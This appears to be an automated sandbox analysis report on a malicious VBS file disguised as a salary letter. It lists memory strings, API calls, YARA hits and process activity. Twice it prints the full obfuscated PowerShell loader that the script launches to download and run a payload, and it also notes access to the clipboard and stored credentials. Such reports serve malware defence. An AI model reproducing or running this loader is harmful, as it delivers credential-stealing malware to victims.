Source: powershell.exe, 00000002.00000002.2325392654.000001ACF561F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2486668247.00000000053E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: bhvF097.tmp.10.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
Source: bhvF097.tmp.10.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-30-24/PreSignInSettingsConfig.json?One
Source: bhvF097.tmp.10.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-40-12/PreSignInSettingsConfig.json
Source: bhvF097.tmp.10.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=14d1c105224b3e736c3c
Source: bhvF097.tmp.10.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=7fe112
Source: bhvF097.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
Source: bhvF097.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
Source: bhvF097.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
Source: bhvF097.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
Source: bhvF097.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
Source: bhvF097.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
Source: bhvF097.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
Source: bhvF097.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
Source: bhvF097.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
Source: bhvF097.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
Source: bhvF097.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
Source: bhvF097.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
Source: bhvF097.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
Source: bhvF097.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
Source: bhvF097.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
Source: bhvF097.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
Source: bhvF097.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
Source: bhvF097.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
Source: bhvF097.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
Source: bhvF097.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
Source: bhvF097.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
Source: bhvF097.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
Source: bhvF097.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
Source: bhvF097.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
Source: bhvF097.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
Source: bhvF097.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
Source: bhvF097.tmp.10.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
Source: bhvF097.tmp.10.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: msiexec.exe, msiexec.exe, 0000000E.00000002.2618173739.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: msiexec.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhvF097.tmp.10.dr String found in binary or memory: https://www.office.com/
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0041183A OpenClipboard,GetLastError, 10_2_0041183A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, 10_2_0040987A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 10_2_004098E2
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 13_2_00406DFC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, 13_2_00406E9F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 14_2_004068B5
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, 14_2_004072B5

E-Banking Fraud

barindex
Source: Yara match File source: 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3460765739.0000000006A1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 3976, type: MEMORYSTR

System Summary

barindex
Source: Initial file: Call Caricologist.ShellExecute(Fluvious, Chr(34) & Angry & Chr(34), "", "", Indhftes)
Source: C:\Windows\System32\wscript.exe COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000} Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gearstngers Checkoffs Unappealingly spectatress Asynkron Proglottis #>;$Romancy='Greyfly';<#Israelitter Dikotomien Pavens Dokumentbehandlings Xenophobia Nel #>;$Glossocomium44=$Velstandsstigning+$host.UI;If ($Glossocomium44) {$Kautioneringernes++;}function Perspicable($React){$Yecchs=$stactes+$React.'Length'-$Kautioneringernes; for( $Mglingernes=3;$Mglingernes -lt $Yecchs;$Mglingernes+=4){$Kordninger='Romancens';$Tudehovedets+=$React[$Mglingernes];$Tusindfryds='stenrkners';}$Tudehovedets;}function Unmudded($Listevalget){ & ($Bikarbonaters) ($Listevalget);}$Fagomraadernes=Perspicable ' I MFrsof.rzDiai splTollnedas r/Lgn5Bla.Wee0Dmo Win(NysWUnciAfhnl ad U oUnswOvese,u C N D TCey ste1Dem0Par.For0.ry; as aaW,luiTr.nJ,n6Hum4Cri;Pla skaxOpe6Gyr4s m;Per UrirUgevDiv:Er.1Hys2bet1slu.Hal0For)F,r re GForeVi.c s.kFagoKon/Emp2Gar0 No1s m0Aut0Co 1Ph,0 Ud1,po NiF HoiAzorspkesalfT doAgrxTis/Fre1Fej2gas1U,f.Amb0 u ';$Novelisers=Perspicable ' quuFiss P.EFedr ,v-T.oABnfg E e ensp T B. ';$stigma=Perspicable 'R,th V t yptstepFla:Vol/ i/A.gl tunFo 6sexb a9 Ga. Ens nhsouoR spDam/ dsIsndB Roo eld reHGlyWBreP FewHow/ scKNomo svkNokkDraeBesrObteAb r ChiEndnU sg Ar.stioCh.c Inx ev ';$Milieuers=Perspicable 'b r>Ben ';$Bikarbonaters=Perspicable ' asiKivE uXCh, ';$Paraffineredes='implicity';$stofmisbrugs='\Lokumernes.sus';Unmudded (Perspicable 'Usi$ flgEm L Reo Vab slA OmL Ha: CaFstuO opR erdIcom A Tjou= Ls$wheeVe,NPotv et:MonaFysPElsPA pdAi ATreTIntA,ro+ co$Laks rTVacOsenF orM raI DessveBEntrsakUPu gEubsBoh ');Unmudded (Perspicable 'Pol$ ftgManl tro unBsamAIntLPej: MtT whuD,mAT xr o EPargAre=bac$ .asAdrtArviIncg D,M naaGav.Tils LaPBetLBe.IPo T Tr(Unp$ColMagaisagLP eIskoELanuUndE.roRRe,sKon)Pla ');Unmudded (Perspicable 'Hel[smanAtteTritA k.DefsAnoe.lorKr v niiMa,C suE,krPferOsliiR,mNtr t agM efA vnNforAAn G .yEImpRW m]Kal:pri: KasF reMe cs,ruBalrsmaINobtH eystrP stRRenoBr.t B o sac.mao roLCh c o=Vib sov[ PiNUnbesnvtLet.Cars FoETryCRekU HeRstai TitTidY FlPCurRN.do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable ' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM lmFev.M cn,hoeArmT sa. stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko ';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyG
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gearstngers Checkoffs Unappealingly spectatress Asynkron Proglottis #>;$Romancy='Greyfly';<#Israelitter Dikotomien Pavens Dokumentbehandlings Xenophobia Nel #>;$Glossocomium44=$Velstandsstigning+$host.UI;If ($Glossocomium44) {$Kautioneringernes++;}function Perspicable($React){$Yecchs=$stactes+$React.'Length'-$Kautioneringernes; for( $Mglingernes=3;$Mglingernes -lt $Yecchs;$Mglingernes+=4){$Kordninger='Romancens';$Tudehovedets+=$React[$Mglingernes];$Tusindfryds='stenrkners';}$Tudehovedets;}function Unmudded($Listevalget){ & ($Bikarbonaters) ($Listevalget);}$Fagomraadernes=Perspicable ' I MFrsof.rzDiai splTollnedas r/Lgn5Bla.Wee0Dmo Win(NysWUnciAfhnl ad U oUnswOvese,u C N D TCey ste1Dem0Par.For0.ry; as aaW,luiTr.nJ,n6Hum4Cri;Pla skaxOpe6Gyr4s m;Per UrirUgevDiv:Er.1Hys2bet1slu.Hal0For)F,r re GForeVi.c s.kFagoKon/Emp2Gar0 No1s m0Aut0Co 1Ph,0 Ud1,po NiF HoiAzorspkesalfT doAgrxTis/Fre1Fej2gas1U,f.Amb0 u ';$Novelisers=Perspicable ' quuFiss P.EFedr ,v-T.oABnfg E e ensp T B. ';$stigma=Perspicable 'R,th V t yptstepFla:Vol/ i/A.gl tunFo 6sexb a9 Ga. Ens nhsouoR spDam/ dsIsndB Roo eld reHGlyWBreP FewHow/ scKNomo svkNokkDraeBesrObteAb r ChiEndnU sg Ar.stioCh.c Inx ev ';$Milieuers=Perspicable 'b r>Ben ';$Bikarbonaters=Perspicable ' asiKivE uXCh, ';$Paraffineredes='implicity';$stofmisbrugs='\Lokumernes.sus';Unmudded (Perspicable 'Usi$ flgEm L Reo Vab slA OmL Ha: CaFstuO opR erdIcom A Tjou= Ls$wheeVe,NPotv et:MonaFysPElsPA pdAi ATreTIntA,ro+ co$Laks rTVacOsenF orM raI DessveBEntrsakUPu gEubsBoh ');Unmudded (Perspicable 'Pol$ ftgManl tro unBsamAIntLPej: MtT whuD,mAT xr o EPargAre=bac$ .asAdrtArviIncg D,M naaGav.Tils LaPBetLBe.IPo T Tr(Unp$ColMagaisagLP eIskoELanuUndE.roRRe,sKon)Pla ');Unmudded (Perspicable 'Hel[smanAtteTritA k.DefsAnoe.lorKr v niiMa,C suE,krPferOsliiR,mNtr t agM efA vnNforAAn G .yEImpRW m]Kal:pri: KasF reMe cs,ruBalrsmaINobtH eystrP stRRenoBr.t B o sac.mao roLCh c o=Vib sov[ PiNUnbesnvtLet.Cars FoETryCRekU HeRstai TitTidY FlPCurRN.do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable ' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM lmFev.M cn,hoeArmT sa. stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko ';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyG Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 10_2_0040DD85
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00401806 NtdllDefWindowProc_W, 10_2_00401806
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_004018C0 NtdllDefWindowProc_W, 10_2_004018C0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004016FD NtdllDefWindowProc_A, 13_2_004016FD
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004017B7 NtdllDefWindowProc_A, 13_2_004017B7
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00402CAC NtdllDefWindowProc_A, 14_2_00402CAC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00402D66 NtdllDefWindowProc_A, 14_2_00402D66
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD3443B276 2_2_00007FFD3443B276
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD3443C022 2_2_00007FFD3443C022
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD34433912 2_2_00007FFD34433912
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD34434D08 2_2_00007FFD34434D08
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD3443DB65 2_2_00007FFD3443DB65
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_22330081 7_2_22330081
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_22337194 7_2_22337194
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_2232B5C1 7_2_2232B5C1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0044B040 10_2_0044B040
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0043610D 10_2_0043610D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00447310 10_2_00447310
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0044A490 10_2_0044A490
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0040755A 10_2_0040755A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0043C560 10_2_0043C560
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0044B610 10_2_0044B610
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0044D6C0 10_2_0044D6C0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_004476F0 10_2_004476F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0044B870 10_2_0044B870
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0044081D 10_2_0044081D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00414957 10_2_00414957
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_004079EE 10_2_004079EE
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00407AEB 10_2_00407AEB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0044AA80 10_2_0044AA80
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00412AA9 10_2_00412AA9
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00404B74 10_2_00404B74
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00404B03 10_2_00404B03
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0044BBD8 10_2_0044BBD8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00404BE5 10_2_00404BE5
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00404C76 10_2_00404C76
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00415CFE 10_2_00415CFE
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00416D72 10_2_00416D72
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00446D30 10_2_00446D30
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00446D8B 10_2_00446D8B
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00406E8F 10_2_00406E8F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00405038 13_2_00405038
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0041208C 13_2_0041208C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004050A9 13_2_004050A9
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0040511A 13_2_0040511A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0043C13A 13_2_0043C13A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004051AB 13_2_004051AB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00449300 13_2_00449300
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0040D322 13_2_0040D322
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0044A4F0 13_2_0044A4F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0043A5AB 13_2_0043A5AB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00413631 13_2_00413631
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00446690 13_2_00446690
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0044A730 13_2_0044A730
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004398D8 13_2_004398D8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004498E0 13_2_004498E0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0044A886 13_2_0044A886
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0043DA09 13_2_0043DA09
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00438D5E 13_2_00438D5E
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00449ED0 13_2_00449ED0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0041FE83 13_2_0041FE83
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00430F54 13_2_00430F54
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_004050C2 14_2_004050C2
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_004014AB 14_2_004014AB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00405133 14_2_00405133
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_004051A4 14_2_004051A4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00401246 14_2_00401246
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_0040CA46 14_2_0040CA46
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00405235 14_2_00405235
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_004032C8 14_2_004032C8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00401689 14_2_00401689
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00402F60 14_2_00402F60
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 004169A7 appears 87 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 0044DB70 appears 41 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 004165FF appears 35 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00422297 appears 42 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00444B5A appears 37 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00413025 appears 79 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00416760 appears 69 times
Source: Salary Increase Letter_Oct 2024.vbs Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 4947
Source: unknown Process created: Commandline size = 4947
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 4947 Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBS@18/10@2/3
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free, 10_2_004182CE
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle, 14_2_00410DE1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free, 10_2_00418758
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle, 10_2_00413D4C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource, 10_2_004148B6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Lokumernes.sus Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3152:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_03
Source: C:\Windows\SysWOW64\msiexec.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-KC5V8F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_by2ssk52.nr3.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Increase Letter_Oct 2024.vbs"
Source: C:\Windows\SysWOW64\msiexec.exe System information queried: HandleInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=948
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4900
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: msiexec.exe, msiexec.exe, 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: msiexec.exe, msiexec.exe, 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: msiexec.exe, 00000007.00000002.3473023585.0000000022760000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: msiexec.exe, msiexec.exe, 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: msiexec.exe, msiexec.exe, 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: msiexec.exe, msiexec.exe, 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: msiexec.exe, 0000000A.00000003.2635522754.0000000004F1E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2643972273.0000000004F1F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
